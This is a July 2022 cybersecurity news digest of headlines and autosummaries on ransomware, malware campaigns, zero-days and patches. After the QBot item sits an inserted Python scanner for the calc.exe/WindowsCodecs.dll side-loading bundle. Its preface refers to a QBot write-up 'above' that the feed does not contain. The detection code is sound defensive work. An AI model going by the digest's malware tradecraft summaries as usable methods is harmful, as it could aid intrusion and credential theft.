Autosummary: Targeted applications include Mikrotik Router Management Program Winbox, Outlook, FileZilla, Pidgin, Total Commander FTP Client, RealVNC, TightVNC, TigerVNC, and WinSCP. “Initially distributed through exploit kits in the past, Amadey has been installed through SmokeLoader from malicious websites disguised as download pages for cracks and serials of commercial software until recently.”


                Lockbit ransomware gang claims to have breached the Italian Revenue Agency

                exploits ransomware
                2022-07-25 https://securityaffairs.co/wordpress/133640/cyber-crime/lockbit-ransomware-italian-revenue-agency.html

The ransomware group Lockbit claims to have stolen 78 GB of files from the Italian Revenue Agency (Agenzia delle Entrate) and has added the government agency to the list of victims on its dark web leak site. “The Revenue Agency, operational since 1 January […]


Autosummary: The group claims to have stolen 78 GB of data, including company documents, scans, financial reports, and contracts, and says it will release screenshots of files and samples very soon.


                Lightning Framework, modular Linux malware

                exploits
                2022-07-25 https://blog.malwarebytes.com/reports/2022/07/lightning-framework-modular-linux-malware/

Researchers at Intezer have published an analysis of a modular and versatile malware targeting Linux systems called Lightning Framework.


Autosummary: The Lightning Framework has a modular structure, consisting of a downloader (Lightning.Downloader) and a core module (Lightning.Core), with a number of plugins.


                Experts Uncover New "CosmicStrand" UEFI Firmware Rootkit Used by Chinese Hackers

                industry
                2022-07-25 https://thehackernews.com/2022/07/experts-uncover-new-cosmicstrand-uefi.html
An unknown Chinese-speaking threat actor has been attributed to a new kind of sophisticated UEFI firmware rootkit called CosmicStrand. "The rootkit is located in the firmware images of Gigabyte or ASUS motherboards, and we noticed that all these images are related to designs using the H81 chipset," Kaspersky researchers said in a new report published today. "This suggests that a common

Autosummary: The "shellcodes received from the [command-and-control] server might be stagers for attacker-supplied PE executables, and it is very likely that many more exist," Kaspersky noted, adding it found a total of two versions of the rootkit, one which was used between the end of 2016 and mid-2017, and the latest variant, which was active in 2020.


                Hackers exploited PrestaShop zero-day to breach online stores

                exploits
                2022-07-25 https://www.bleepingcomputer.com/news/security/hackers-exploited-prestashop-zero-day-to-breach-online-stores/
Hackers are targeting websites using the PrestaShop platform, leveraging a previously unknown vulnerability chain to perform code execution and potentially steal customers' payment information. [...]

Autosummary: "We believe attackers are targeting shops using outdated software or modules, vulnerable third-party modules, or a yet-to-be-discovered vulnerability," explains the PrestaShop security advisory.


                Lock down your Neopets account: Data breach being investigated

                financial
                2022-07-25 https://blog.malwarebytes.com/cybercrime/2022/07/lock-down-your-neopets-account-now-alleged-data-breach-being-investigated/

                We take a look at claims that virtual pet favourite, Neopets, has had its user database breached, and what you can do about it.


Autosummary: Allegedly exposed fields include usernames, names, email address, date of birth, zip code, gender, country, and registration email. Considering the young age of many Neopets players, this would be quite bad from a privacy and safety standpoint, if the breach turns out to be genuine.


                Malware spent months hoovering up credit card details from 300 US restaurants

                exploits
                2022-07-25 https://blog.malwarebytes.com/awareness/2022/07/magecart-infection/

                MenuDrive, Harbortouch, and InTouchPOS fell victim to a long Magecart infection that started in January and only ended days ago.


Autosummary: Although MenuDrive, Harbortouch, and InTouchPOS are not as popular as Uber Eats, Hungrrr, or DoorDash, many small, local restaurants across the US outsource their online ordering process to them as it’s cost-effective.


                Intel partners with MediaTek to manufacture new chips for a range of smart edge devices

                industry
                2022-07-25 https://www.helpnetsecurity.com/2022/07/26/intel-mediatek/

                Intel and MediaTek announced a partnership to manufacture chips using Intel Foundry Services’ (IFS) process technologies. The agreement is designed to help MediaTek build a supply chain through the addition of a new foundry partner with capacity in the United States and Europe. MediaTek plans to use Intel process technologies to manufacture multiple chips for a range of smart edge devices. IFS offers a manufacturing platform with technologies optimized for high performance, low power and … More



                CosmicStrand, a new sophisticated UEFI firmware rootkit linked to China

                industry
                2022-07-25 https://securityaffairs.co/wordpress/133658/malware/cosmicstrand-uefi-firmware-rootkit.html

Kaspersky uncovered a new UEFI firmware rootkit, tracked as CosmicStrand, which it attributes to an unknown Chinese-speaking threat actor. The malware was first spotted by Chinese firm Qihoo360 in 2017. The researchers were not […]


Autosummary: The victims identified by the researchers are private individuals located in China, Vietnam, Iran, and Russia, with no link to any organization or industry vertical.


                Amadey malware pushed via software cracks in SmokeLoader campaign

                exploits
                2022-07-24 https://www.bleepingcomputer.com/news/security/amadey-malware-pushed-via-software-cracks-in-smokeloader-campaign/
A new version of the Amadey Bot malware is distributed through the SmokeLoader malware, using software cracks and keygen sites as lures. [...]

Autosummary: [Figure: POST request exfiltrating screenshots (ASEC).] One of the downloaded DLL plugins, "cred.dll," which is run through "rundll32.exe," attempts to steal information from the following software: Mikrotik Router Management Program Winbox, Outlook, FileZilla, Pidgin, Total Commander FTP Client, RealVNC, TightVNC, TigerVNC, and WinSCP. Of course, if RedLine is loaded onto the host, the targeting scope is expanded dramatically, and the victim risks losing account credentials, communications, files, and cryptocurrency assets.


                QBot phishing uses Windows Calculator sideloading to infect devices

                financial
                2022-07-24 https://www.bleepingcomputer.com/news/security/qbot-phishing-uses-windows-calculator-sideloading-to-infect-devices/
The operators of the QBot malware have been using the Windows Calculator to side-load the malicious payload on infected computers. [...]

Autosummary: [Figure: HTML attachment on QBot spam emails.] The ISO contains a .LNK file, a copy of "calc.exe" (Windows Calculator), and two DLL files, namely WindowsCodecs.dll and a payload named 7533.dll.
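The ISO layout described in this item and in the Security Affairs write-up above (a .lnk launcher, a copy of calc.exe, WindowsCodecs.dll and the payload DLL side by side) is easy to look for on disk, because the genuine WindowsCodecs.dll is only ever loaded from the system directories. The scanner below is an added example, not code from BleepingComputer, Cyble or ProxyLife; the directory it builds is a constructed stand-in for a mounted ISO with placeholder file contents, and the host/DLL pair list and trusted-directory list are assumptions a defender would maintain.

```python
"""Scan a directory tree for the calc.exe / WindowsCodecs.dll side-loading
bundle described above. Added example, not code from BleepingComputer,
Cyble or ProxyLife."""
import os
import tempfile
from dataclasses import dataclass, field

# Trusted host binary -> DLL names it resolves from its own directory.
# calc.exe / WindowsCodecs.dll is the pair from the QBot campaign; a defender
# would extend this list (assumption).
SIDELOAD_PAIRS = {
    "calc.exe": {"windowscodecs.dll"},
}

# Where the genuine binary and DLL live; a copy anywhere else is relocated.
# Assumes the default %SystemRoot%; paths are compared lower-cased.
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")


@dataclass
class Finding:
    directory: str
    host_binary: str
    dlls: list = field(default_factory=list)       # DLLs the host would side-load
    launchers: list = field(default_factory=list)  # .lnk files in the same directory
    extras: list = field(default_factory=list)     # other DLLs (payload candidates)

    @property
    def score(self) -> int:
        """2 for host+DLL together, +1 per launcher, +1 per extra DLL."""
        return 2 + len(self.launchers) + len(self.extras)


def _in_trusted_dir(path: str) -> bool:
    norm = os.path.abspath(path).lower().replace("/", "\\")
    return any(norm.startswith(t) for t in TRUSTED_DIRS)


def find_sideload_bundles(root: str) -> list:
    """Walk `root`; return one Finding per directory holding a relocated host
    binary next to a DLL it would side-load."""
    findings = []
    for dirpath, _, files in os.walk(root):
        if _in_trusted_dir(dirpath):
            continue
        by_lower = {f.lower(): f for f in files}
        for host, dll_names in SIDELOAD_PAIRS.items():
            if host not in by_lower:
                continue
            dlls = [by_lower[d] for d in sorted(dll_names) if d in by_lower]
            if not dlls:
                continue
            launchers = sorted(f for f in files if f.lower().endswith(".lnk"))
            extras = sorted(
                f for f in files
                if f.lower().endswith(".dll") and f.lower() not in dll_names
            )
            findings.append(Finding(dirpath, by_lower[host], dlls, launchers, extras))
    return findings


def build_sample_tree() -> str:
    """Constructed stand-in for the mounted ISO: file names mirror the report
    (a .lnk, a calc.exe copy, WindowsCodecs.dll, payload 7533.dll) with
    placeholder contents, plus one benign directory."""
    root = tempfile.mkdtemp(prefix="qbot_iso_")
    iso_dir = os.path.join(root, "mounted_iso")
    benign_dir = os.path.join(root, "docs")
    os.makedirs(iso_dir)
    os.makedirs(benign_dir)
    for name in ("Invoice.lnk", "calc.exe", "WindowsCodecs.dll", "7533.dll"):
        with open(os.path.join(iso_dir, name), "wb") as fh:
            fh.write(b"placeholder")
    with open(os.path.join(benign_dir, "readme.txt"), "w") as fh:
        fh.write("nothing to see here\n")
    return root


def scan_sample() -> list:
    """Build the constructed tree and scan it."""
    return find_sideload_bundles(build_sample_tree())


if __name__ == "__main__":
    for f in scan_sample():
        print(f"{f.directory}: {f.host_binary} + {f.dlls}, launchers {f.launchers}, "
              f"other DLLs {f.extras}, score {f.score}")
```

Point `find_sideload_bundles` at user-writable locations (Downloads, Temp, mounted ISO drive letters) rather than the whole disk; the trusted-directory exclusion is what keeps the real Calculator out of the results.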


                Dynatrace enhances its analytics capabilities for modern multicloud environments

                industry
                2022-07-23 https://www.helpnetsecurity.com/2022/07/23/dynatrace-platform-enhancement/

                Dynatrace announced it has enhanced its analytics capabilities for modern multicloud environments by unifying its AI-powered log analytics with its digital experience monitoring (DEM) capabilities, including Session Replay. This latest enhancement to the Dynatrace platform enables development teams to automatically gain deeper insights into specific user journeys by connecting logs to the user sessions that generated them. This additional context allows teams to use the platform’s DEM capabilities to analyze relevant user sessions and behavior … More



                The Week in Ransomware - July 22nd 2022 - Attacks abound

                exploits ransomware
                2022-07-23 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-july-22nd-2022-attacks-abound/
New ransomware operations continue to be launched this week, with the new Luna ransomware found to be targeting both Windows and VMware ESXi servers. [...]

Autosummary: Contributors and those who provided new ransomware information and stories this week include: @serghei, @VK_Intel, @jorntvdw, @DanielGallagher, @struppigel, @PolarToffee, @FourOctets, @Seifreed, @malwrhunterteam, @Ionut_Ilascu, @LawrenceAbrams, @demonslay335, @billtoulas, @BleepinComputer, @fwosar, @malwareforme, @AdvIntel, @AuCyble, @kaspersky, @pcrisk, @corintxt, @Amigo_A_, and @jgreigj.


                SonicWall fixed critical SQLi in Analytics and GMS products

                industry
                2022-07-23 https://securityaffairs.co/wordpress/133579/security/sonicwall-critical-sqli.html

SonicWall released updates to address a critical SQL injection (SQLi) vulnerability, tracked as CVE-2022-22280 (CVSS score 9.4), in its Analytics On-Prem and Global Management System (GMS) products. “Improper Neutralization of Special Elements used in an […]



                FBI seized $500,000 worth of bitcoin obtained from Maui ransomware attacks

                exploits ransomware
                2022-07-23 https://securityaffairs.co/wordpress/133587/cyber-warfare-2/fbi-seized-bitcoin-maui-ransomware.html

The U.S. Department of Justice (DoJ) has seized $500,000 worth of Bitcoin from North Korea-linked threat actors who used the Maui ransomware to target several organizations worldwide. “The Justice Department today announced a complaint filed in […]


Autosummary: “The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of the Treasury (Treasury) are releasing this joint Cybersecurity Advisory (CSA) to provide information on Maui ransomware, which has been used by North Korean state-sponsored cyber actors since at least May 2021 to target Healthcare and Public Health (HPH) Sector organizations,” reads the advisory published by US authorities.


                North Korean hackers attack EU targets with Konni RAT malware

                exploits
                2022-07-23 https://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/
Threat analysts have uncovered a new campaign attributed to APT37, a North Korean group of hackers, targeting high-value organizations in the Czech Republic, Poland, and other European countries. [...]

Autosummary: [Figure: Base64-encoded PowerShell adds scheduled task (Securonix).] At this phase of the attack, the actor has already loaded the RAT and established a data exchange link, and is capable of performing the following actions: capture screenshots using the Win32 GDI API and exfiltrate them in GZIP form.


                CommScope partners with Microsoft to help transform industrial manufacturing

                industry
                2022-07-23 https://www.helpnetsecurity.com/2022/07/24/commscope-microsoft/

                CommScope announced that it has collaborated with Microsoft to create a converged private wireless network solution, enabling new low-latency and mobile applications to transform industrial manufacturing. CommScope successfully deployed the combined solution—using Microsoft Azure private MEC and CommScope CBRS access points—in its own manufacturing innovation center in Shakopee, Minnesota. Through this cloud-connected, low-latency private wireless network, CommScope is already improving both the operational efficiency and manufacturing agility of its facilities. This solution brings augmented reality … More



                How kitemarks are kicking off IoT regulation

                industry
                2022-07-22 https://www.helpnetsecurity.com/2022/07/22/how-kitemarks-are-kicking-off-iot-regulation/

                Regulation of the Internet of Things (IoT) has always been a contentious subject. Those against claim it stymies growth of a nascent industry, while those advocating for it argue it sees the adoption of industry best practices and helps establish standards. In an effort to straddle the divide, the Department for Digital, Culture, Media and Sport (DCMS) launched its Code of Practice back in 2018. Enshrined in this were 13 “Secure by Design” principles aimed … More


Autosummary: Baseline criteria will focus on asset identification, product configuration, data protection, interface access control, software updates, cybersecurity state awareness, documentation, information and query reception, information dissemination, and product education and awareness. The idea is to start with these controls before introducing other requirements further down the line, such as data protection, securely designed software/hardware, privacy, resilience, and user support. These cover issues including passwords and credentials, vulnerabilities and anomalies, software, secure configuration, communications, and usage of data. It differs, however, in that its recommendations are “outcome based”, no single conformity assessment will be adopted, and a single binary label has been suggested to act as a “seal of approval”.


                TA4563 group leverages EvilNum malware to target European financial and investment entities

                financial exploits
                2022-07-22 https://securityaffairs.co/wordpress/133535/apt/ta4563-group-evilnum-malware.html

A threat actor tracked as TA4563 is using EvilNum malware to target European financial and investment entities, Proofpoint reported. The group focuses on entities with operations supporting foreign exchanges, cryptocurrency, and decentralized finance (DeFi). EvilNum is a […]


Autosummary: “These messages used a remote template document that analysts observed attempting to communicate with domains to install several LNK loader components, leveraging wscript to load the EvilNum payload, and a JavaScript payload that was ultimately installed on the user’s host,” reads the analysis published by Proofpoint.


                Candiru Spyware Caught Exploiting Google Chrome Zero-Day to Target Journalists

                exploits
                2022-07-22 https://thehackernews.com/2022/07/candiru-spyware-caught-exploiting.html
The actively exploited but now-fixed Google Chrome zero-day flaw that came to light earlier this month was weaponized by an Israeli spyware company and used in attacks targeting journalists in the Middle East. Czech cybersecurity firm Avast linked the exploitation to Candiru (aka Saito Tech), which has a history of leveraging previously unknown flaws to deploy a Windows malware dubbed

Autosummary: Via this watering hole technique, a profile of the victim's browser, consisting of about 50 data points, is created, including details like language, timezone, screen information, device type, browser plugins, referrer, and device memory, among others.


                Candiru surveillance spyware DevilsTongue exploited Chrome Zero-Day to target journalists

                exploits
                2022-07-22 https://securityaffairs.co/wordpress/133546/intelligence/candiru-chrome-zero-day.html

The DevilsTongue spyware, developed by Israeli surveillance firm Candiru, exploited the recently fixed CVE-2022-2294 Chrome zero-day in attacks against journalists in the Middle East, researchers from the antivirus firm Avast reported. The flaw, which […]


Autosummary: The flaw, which was fixed by Google on July 4, 2022, is a heap buffer overflow in the Web Real-Time Communications (WebRTC) component; it is the fourth zero-day patched by Google in 2022.


                SonicWall: Patch critical SQL injection bug immediately

                exploits
                2022-07-22 https://www.bleepingcomputer.com/news/security/sonicwall-patch-critical-sql-injection-bug-immediately/
SonicWall has published a security advisory today to warn of a critical SQL injection flaw impacting the GMS (Global Management System) and Analytics On-Prem products. [...]



                macOS malware: myth vs. reality – Week in security with Tony Anscombe

                exploits
                2022-07-22 https://www.welivesecurity.com/videos/macos-malware-myth-vs-reality-week-security-tony-anscombe/

ESET research shows yet again that macOS is not immune to malware – and why some users can benefit from Apple’s Lockdown Mode.



                Digital security giant Entrust breached by ransomware gang

                exploits ransomware
                2022-07-22 https://www.bleepingcomputer.com/news/security/digital-security-giant-entrust-breached-by-ransomware-gang/
Digital security giant Entrust has confirmed that it suffered a cyberattack where threat actors breached their network and stole data from internal systems. [...]

Autosummary: This includes US government agencies, such as the Department of Energy, Department of Homeland Security, the Department of the Treasury, the Department of Health & Human Services, the Department of Veterans Affairs, the Department of Agriculture, and many more.


                SonicWall Issues Patch for Critical Bug Affecting its Analytics and GMS Products

                exploits industry
                2022-07-22 https://thehackernews.com/2022/07/sonicwall-issues-patch-for-critical-bug.html
Network security company SonicWall on Friday rolled out fixes to mitigate a critical SQL injection (SQLi) vulnerability affecting its Analytics On-Prem and Global Management System (GMS) products. The vulnerability, tracked as CVE-2022-22280, is rated 9.4 for severity on the CVSS scoring system and stems from what the company describes as an "improper neutralization of special elements" used in



                Siemens Energy joins AWS Partner Network to provide customers with industrial cybersecurity solutions

                industry ciber
                2022-07-22 https://www.helpnetsecurity.com/2022/07/23/siemens-energy-aws/

                Siemens Energy announces it is joining the Amazon Web Services (AWS) Partner Network (APN), a global community of partners that leverage programs, expertise, and resources to build, market, and sell customer offerings. This expanded relationship includes listing Siemens Energy’s Managed Detection and Response (MDR) industrial cyber security solution in AWS Marketplace, a digital catalog that makes it easy for customers to find, compare, and immediately start using the software and services that run on AWS. … More

                The post Siemens Energy joins AWS Partner Network to provide customers with industrial cybersecurity solutions appeared first on Help Net Security.

                Autosummary: “The energy transition relies on seamlessly connecting physical assets with digital technologies to foster innovation, reduce emissions, and improve efficiency, but this future depends on strong cybersecurity across the whole supply chain,” said Leo Simonovich, Vice President and Global Head of Industrial Cyber, Siemens Energy.


                New ‘Lightning Framework’ Linux malware installs rootkits, backdoors

                exploits
                2022-07-21 https://www.bleepingcomputer.com/news/security/new-lightning-framework-linux-malware-installs-rootkits-backdoors/
                A new and previously undetected malware dubbed "Lightning Framework" targets Linux systems and can be used to backdoor infected devices using SSH and deploy multiple types of rootkits. [...]

                Autosummary: "Malware targeting Linux environments surged in 2021, with a large amount of innovation resulting in new malicious code, especially in ransomwares, trojans, and botnets," Robinson said.


                New Redeemer ransomware version promoted on hacker forums

                exploits ransomware
                2022-07-21 https://www.bleepingcomputer.com/news/security/new-redeemer-ransomware-version-promoted-on-hacker-forums/
                A threat actor is promoting a new version of their free-to-use "Redeemer" ransomware builder on hacker forums, offering unskilled threat actors an easy entry to the world of encryption-backed extortion attacks. [...]

                Autosummary: According to its author, the new version 2.0 release was written entirely in C++ and works on Windows Vista, 7, 8, 10, and 11, featuring multi-threaded performance and a medium AV detection rate.


                Atlassian Rolls Out Security Patch for Critical Confluence Vulnerability

                exploits
                2022-07-21 https://thehackernews.com/2022/07/atlassian-releases-patch-for-critical.html
                Atlassian has rolled out fixes to remediate a critical security vulnerability pertaining to the use of hard-coded credentials affecting the Questions For Confluence app for Confluence Server and Confluence Data Center. The flaw, tracked as CVE-2022-26138, arises when the app in question is enabled on either of two services, causing it to create a Confluence user account with the username …


                FBI Seizes $500,000 Ransomware Payments and Crypto from North Korean Hackers

                exploits ransomware
                2022-07-21 https://thehackernews.com/2022/07/fbi-seizes-500000-ransomware-payments.html
                The U.S. Department of Justice (DoJ) has announced the seizure of $500,000 worth of Bitcoin from North Korean hackers who extorted digital payments from several organizations by using a new ransomware strain known as Maui. "The seized funds include ransoms paid by healthcare providers in Kansas and Colorado," the DoJ said in a press release issued Tuesday. The recovery of the bitcoin ransoms …


                How Conti ransomware hacked and encrypted the Costa Rican government

                exploits latam government ransomware
                2022-07-21 https://www.bleepingcomputer.com/news/security/how-conti-ransomware-hacked-and-encrypted-the-costa-rican-government/
                Details have emerged on how the Conti ransomware gang breached the Costa Rican government, showing the attack's precision and the speed of moving from initial access to the final stage of encrypting devices. [...]

                Autosummary: A diagram of the attack flow: Conti ransomware attack flow on Costa Rica (source: AdvIntel). Post-attack: national emergency, Conti shut down. According to a note on the Conti leak site, the ransom demand was initially $10 million and then increased to $20 million when Costa Rica refused to pay.


                The rise and continuing popularity of LinkedIn-themed phishing

                financial ransomware
                2022-07-21 https://www.helpnetsecurity.com/2022/07/21/linkedin-phishing/

                Phishing emails impersonating LinkedIn continue to make the bulk of all brand phishing attempts; according to Check Point, 45% of all email phishing attempts in Q2 2022 imitated the style of communication of the professional social media platform, with the goal of directing targets to a spoofed LinkedIn login page and collecting their account credentials. The phishers are generally trying to pique the targets’ interest with fake messages claiming that they “have appeared in X … More

                The post The rise and continuing popularity of LinkedIn-themed phishing appeared first on Help Net Security.

                Autosummary: As noted before, LinkedIn-themed phishing emails are more likely to come in the form of fake notifications about messages, contacts and searches featuring the target, occasionally even mentioning that people from specific high-profile companies have been looking at the target’s profile.


                New Linux Malware Framework Lets Attackers Install Rootkit on Targeted Systems

                exploits
                2022-07-21 https://thehackernews.com/2022/07/new-linux-malware-framework-let.html
                A never-before-seen Linux malware has been dubbed a "Swiss Army Knife" for its modular architecture and its capability to install rootkits. This previously undetected Linux threat, called Lightning Framework by Intezer, is equipped with a plethora of features, making it one of the most intricate frameworks developed for targeting Linux systems. "The framework has both passive and active …


                Hackers Use Evilnum Malware to Target Cryptocurrency and Commodities Platforms

                exploits
                2022-07-21 https://thehackernews.com/2022/07/hackers-use-evilnum-malware-to-target.html
                The advanced persistent threat (APT) actor tracked as Evilnum is once again exhibiting signs of renewed activity aimed at European financial and investment entities. "Evilnum is a backdoor that can be used for data theft or to load additional payloads," enterprise security firm Proofpoint said in a report shared with The Hacker News. "The malware includes multiple interesting components to evade …


                Atlassian patched a critical Confluence vulnerability

                exploits
                2022-07-21 https://securityaffairs.co/wordpress/133496/hacking/atlassian-confluence-server-data-center-flaw.html

                Atlassian released security updates to address a critical security vulnerability affecting Confluence Server and Confluence Data Center. Atlassian released security updates to address a critical hardcoded credentials vulnerability in Confluence Server and Data Center tracked as CVE-2022-26138. A remote, unauthenticated attacker can exploit the vulnerability to log into unpatched servers. Once installed the Questions for Confluence […]

                The post Atlassian patched a critical Confluence vulnerability appeared first on Security Affairs.

                Autosummary: The affected versions are Questions for Confluence 2.7.x (2.7.34 and 2.7.35) and Questions for Confluence 3.0.x (3.0.2). The company pointed out that uninstalling the Questions for Confluence app does not solve this vulnerability because the disabledsystemuser account is not removed after the app has been uninstalled.


                Chrome zero-day used to infect journalists with Candiru spyware

                exploits
                2022-07-21 https://www.bleepingcomputer.com/news/security/chrome-zero-day-used-to-infect-journalists-with-candiru-spyware/
                The Israeli spyware vendor Candiru was found using a zero-day vulnerability in Google Chrome to spy on journalists and other high-interest individuals in the Middle East with the "DevilsTongue" spyware. [...]

                Autosummary: "The collected information includes the victim’s language, timezone, screen information, device type, browser plugins, referrer, device memory, cookie functionality, and more," explains Avast's report.


                Lightning Framework, a previously undetected malware that targets Linux systems

                exploits
                2022-07-21 https://securityaffairs.co/wordpress/133506/malware/lightning-framework-linux-malware.html

                Researchers discovered a previously undetected malware dubbed ‘Lightning Framework’ that targets Linux systems. Researchers from Intezer discovered a previously undetected malware, tracked as Lightning Framework, which targets Linux systems. The malicious code has a modular structure and is able to install rootkits. “Lightning Framework is a new undetected Swiss Army Knife-like Linux malware that has […]

                The post Lightning Framework, a previously undetected malware that targets Linux systems appeared first on Security Affairs.

                Autosummary: The framework is composed of a downloader and a core module, and it can expand its capabilities with a number of plugins, some of which are open-source tools.


                Windows 11 KB5015882 update fixes bugs causing File Explorer to freeze

                exploits
                2022-07-21 https://www.bleepingcomputer.com/news/microsoft/windows-11-kb5015882-update-fixes-bugs-causing-file-explorer-to-freeze/
                Microsoft has released the optional KB5015882 Preview cumulative update for Windows 11 with 20 fixes or improvements, including new Focus Assist and OS upgrade features. [...]

                Autosummary: What's new in Windows 10 KB5015882 The Windows 10 KB5015882 cumulative update preview includes 20 improvements or fixes, with the highlighted ones listed below: New!


                Senet collaborates with Iota Communications to deliver wireless networks for smart infrastructure sensors

                industry
                2022-07-21 https://www.helpnetsecurity.com/2022/07/22/senet-iota-communications/

                Senet and Iota Communications announced a partnership to deliver LoRaWAN through both 915 MHz unlicensed spectrum and through IotaComm’s 800 MHz FCC-licensed spectrum network connectivity. The initial use cases will be focused on Smart Building, Smart City, and Critical Infrastructure applications. With this collaboration, and in addition to its use of the Senet platform for application and device management, IotaComm has also become a Senet Radio Access Network (RAN) operator and Senet LPWAN Virtual Network … More

                The post Senet collaborates with Iota Communications to deliver wireless networks for smart infrastructure sensors appeared first on Help Net Security.

                Autosummary: Through a combination of sensors, meters, and its Delphi360 wireless connectivity and data analytics platform, IotaComm provides an end-to-end smart building and smart city solution used by building managers, industrial site managers, and city planners to better manage the health, safety, and sustainability goals of their organizations and facilities.


                Demo: Your data has been encrypted! Stopping ransomware attacks with Malwarebytes EDR

                exploits ransomware
                2022-07-21 https://blog.malwarebytes.com/business/2022/07/demo-your-data-has-been-encrypted-stopping-ransomware-attacks-with-malwarebytes-edr/

                Malwarebytes Endpoint Detection and Response can fight—and defeat—advanced ransomware that other security solutions miss. In this post, we’ll walk through what it looks like to deal with a ransomware attack using Malwarebytes EDR.

                The post Demo: Your data has been encrypted! Stopping ransomware attacks with Malwarebytes EDR appeared first on Malwarebytes Labs.

                Autosummary: What's worse, ransomware gangs have increased their attacks on a range of vulnerable industries, with disruptions to business operations, million-dollar ransom demands, data exfiltration, and extortion. Accelerate and simplify your ransomware defense with Malwarebytes EDR In this post, we seamlessly looked at the activity that ransomware exhibited, found a recovery plan for it, then implemented that plan. Part 4: Remediating the ransomware Below, we see a process with a large amount of file activity, namely file renames. Part 3: Isolating the endpoint infected with ransomware Now, as we’re continuing our investigation, we’re looking at this and deciding it looks pretty suspicious – it’s probably unwanted or a potentially damaging activity. So for example, if we hover over the disable Windows Firewall behavior that we saw, on the left, you’ll see that we’ve been partnering with the MITRE foundation and using its attack framework to give you context and a common set of terms that you can use to identify and understand these tactics.


                New Luna ransomware encrypts Windows, Linux, and ESXi systems

                exploits ransomware
                2022-07-20 https://www.bleepingcomputer.com/news/security/new-luna-ransomware-encrypts-windows-linux-and-esxi-systems/
                A new ransomware family dubbed Luna can be used to encrypt devices running several operating systems, including Windows, Linux, and ESXi systems. [...]

                Autosummary: Luna ransomware command-line arguments (Kaspersky). Rust-based cross-platform ransomware: The group behind this new ransomware developed it in Rust and took advantage of the language's platform-agnostic nature to port it to multiple platforms with very few changes to the source code.


                Up to 90% of governmental websites serve cookies or third-party trackers

                government
                2022-07-20 https://www.helpnetsecurity.com/2022/07/20/governmental-websites-cookies-trackers-video/

                In some countries up to 90% of governmental websites add third-party tracker cookies without users’ consent. This occurs even in countries with strict user privacy laws, according to researchers Matthias Götze (TU Berlin), Srdjan Matic (IMDEA Software), Costas Iordanou (Cyprus University of Technology), Georgios Smaragdakis (TU Delft) and Nikolaos Laoutaris (IMDEA Networks). This Help Net Security video shows how nearly all governmental websites serve cookies or third-party trackers without any consent from users.

                The post Up to 90% of governmental websites serve cookies or third-party trackers appeared first on Help Net Security.


                Unpatched GPS Tracker Bugs Could Let Attackers Disrupt Vehicles Remotely

                exploits
                2022-07-20 https://thehackernews.com/2022/07/unpatched-gps-tracker-bugs-could-let.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of a handful of unpatched security vulnerabilities in MiCODUS MV720 Global Positioning System (GPS) trackers outfitted in over 1.5 million vehicles that could lead to remote disruption of critical operations. "Successful exploitation of these vulnerabilities may allow a remote actor to exploit access and gain control of …

                Autosummary: The top countries with the most users include Chile, Australia, Mexico, Ukraine, Russia, Morocco, Venezuela, Brazil, Poland, Italy, Indonesia, Uzbekistan, and South Africa.


                FBI recovers $500,000 healthcare orgs paid to Maui ransomware

                exploits ransomware
                2022-07-20 https://www.bleepingcomputer.com/news/security/fbi-recovers-500-000-healthcare-orgs-paid-to-maui-ransomware/
                The U.S. Department of Justice has announced the seizure of approximately $500,000 in Bitcoin, paid by American health care providers to the operators of the Maui ransomware strain. [...]


                Will new EU crypto rules change how ransomware is played?

                exploits ransomware
                2022-07-20 https://www.computerworld.com/article/3667281/will-new-eu-crypto-rules-change-how-ransomware-is-played.html#tk.rss_security

                Cryptocurrency has always been the payment method of choice for bad guys. Get hit with an enterprise ransomware attack and plan to pay? You’ll need crypto. The key reason cyberthieves love cryptocurrency so much is that it is far harder to trace payments. 

                That is why a move being attempted by the European Union has so much potential. The EU — in a move that will likely be mimicked by many other regional regulatory forces, including in the United States — is putting in place tracking requirements for all cryptocurrency. 

                If it is successful, and the EU has an excellent track record on precisely these kinds of changes, cryptocurrency may quickly fade as the thief’s payment of choice.

                Autosummary: By the way, the EU in this document also listed “non-cooperative jurisdictions for tax purposes,” which include American Samoa, Fiji, Guam, Palau, Panama, Samoa, Trinidad, Tobago, the U.S. Virgin Islands, and Vanuatu. That all said, cryptocurrency exchanges are, sort of, mostly legal operations.


                New Rust-based Ransomware Family Targets Windows, Linux, and ESXi Systems

                exploits ransomware
                2022-07-20 https://thehackernews.com/2022/07/new-rust-based-ransomware-family.html
                Kaspersky security researchers have disclosed details of a brand-new ransomware family written in Rust, making it the third strain after BlackCat and Hive to use the programming language. Luna, as it's called, is "fairly simple" and can run on Windows, Linux, and ESXi systems, with the malware banking on a combination of Curve25519 and AES for encryption. "Both the Linux and ESXi …


                Conti’s Reign of Chaos: Costa Rica in the Crosshairs

                latam
                2022-07-20 https://threatpost.com/contis-costa-rica/180258/
                Aamir Lakhani, with FortiGuard Labs, answers the question: Why is the Conti ransomware gang targeting people and businesses in Costa Rica?

                Autosummary: We’re seeing this in terms of how they recruit, too – going after other threat actors and holding, essentially, recruitment events not that different from what you might expect from big Silicon Valley companies (though obviously a bit more underground). The bureau identified at least 16 attacks by Conti ransomware against U.S. healthcare and First Responder networks, including emergency medical services, law enforcement agencies and 9-1-1 dispatch centers last year.


                Convincing ‘YouTube’ Google ads lead to Windows support scams

                financial
                2022-07-20 https://www.bleepingcomputer.com/news/security/convincing-youtube-google-ads-lead-to-windows-support-scams/
                A scarily realistic-looking Google Search YouTube advertisement is redirecting visitors to tech support scams pretending to be security alerts from Windows Defender. [...]

                Autosummary: Tech support scam shown by a Google ad for YouTube (Source: BleepingComputer). For those using VPNs, the good news is that the scam sites will check if you are running a VPN and, if so, redirect users to the legitimate YouTube site.


                Cisco fixes bug that lets attackers execute commands as root

                exploits
                2022-07-20 https://www.bleepingcomputer.com/news/security/cisco-fixes-bug-that-lets-attackers-execute-commands-as-root/
                Cisco has addressed severe vulnerabilities in the Cisco Nexus Dashboard data center management solution that can let remote attackers execute commands and perform actions with root or Administrator privileges. [...]

                Autosummary: "This vulnerability exists because SSL server certificates are not validated when Cisco Nexus Dashboard is establishing a connection to Cisco Application Policy Infrastructure Controller (APIC), Cisco Cloud APIC, or Cisco Nexus Dashboard Fabric Controller, formerly Data Center Network Manager (DCNM) controllers," the company added in a separate advisory.


                Google Calendar provides new way to block invitation phishing

                financial
